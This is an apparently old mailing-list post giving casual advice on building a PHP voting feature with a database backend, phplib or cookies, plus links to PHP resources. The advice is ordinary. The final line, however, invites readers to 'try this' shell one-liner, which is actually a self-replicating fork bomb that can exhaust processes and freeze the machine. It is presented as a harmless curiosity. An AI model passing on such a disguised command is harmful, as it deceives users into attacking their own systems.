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[vikram] php

i have not followed the thread on phpised voting so this might not serve
any useful purpose _but_ these are some standard approaches to problems
like the one being discussed :

	a) have a db support in the back like postgres, mySQL.
	   php database functionality is a breeze. constructs
	   like pg_connect, pg_result etc... are intuitive and simple
	   to implement. of course as for the voting et al most of
	   these things can be implemented with `limited' knowledge 
	   of rdbms [creation of tables, primary keys etc]

	b) phplibs : now you have decided to sink into the php cesspool :)
	   phplib is a _powerful_ object oriented set of libraries
	   provided for easy functionality. there are _hazaar_ nifty
	   features and is for the serious php developer. iirc, there
	   are many implementations like this already existing

	c) cookies : can be set and their values obtained/ actions
	   taken using direct calls in php. there are some simple things 
	   also for authentication which one can do directly using php
	   if necessary.

imho, (a) is better. having a db allows one to scale in complexity
[like providing additional features] over time and is in general a cleaner

for php sites a starting pt maybe :

	PHP resource index : lots of php stuff
	PHP lib site       : www.phplib.net

again imho the manual is superb and really php is very intuitive.


try this : echo '. ./_&. ./_'>_;. ./_   

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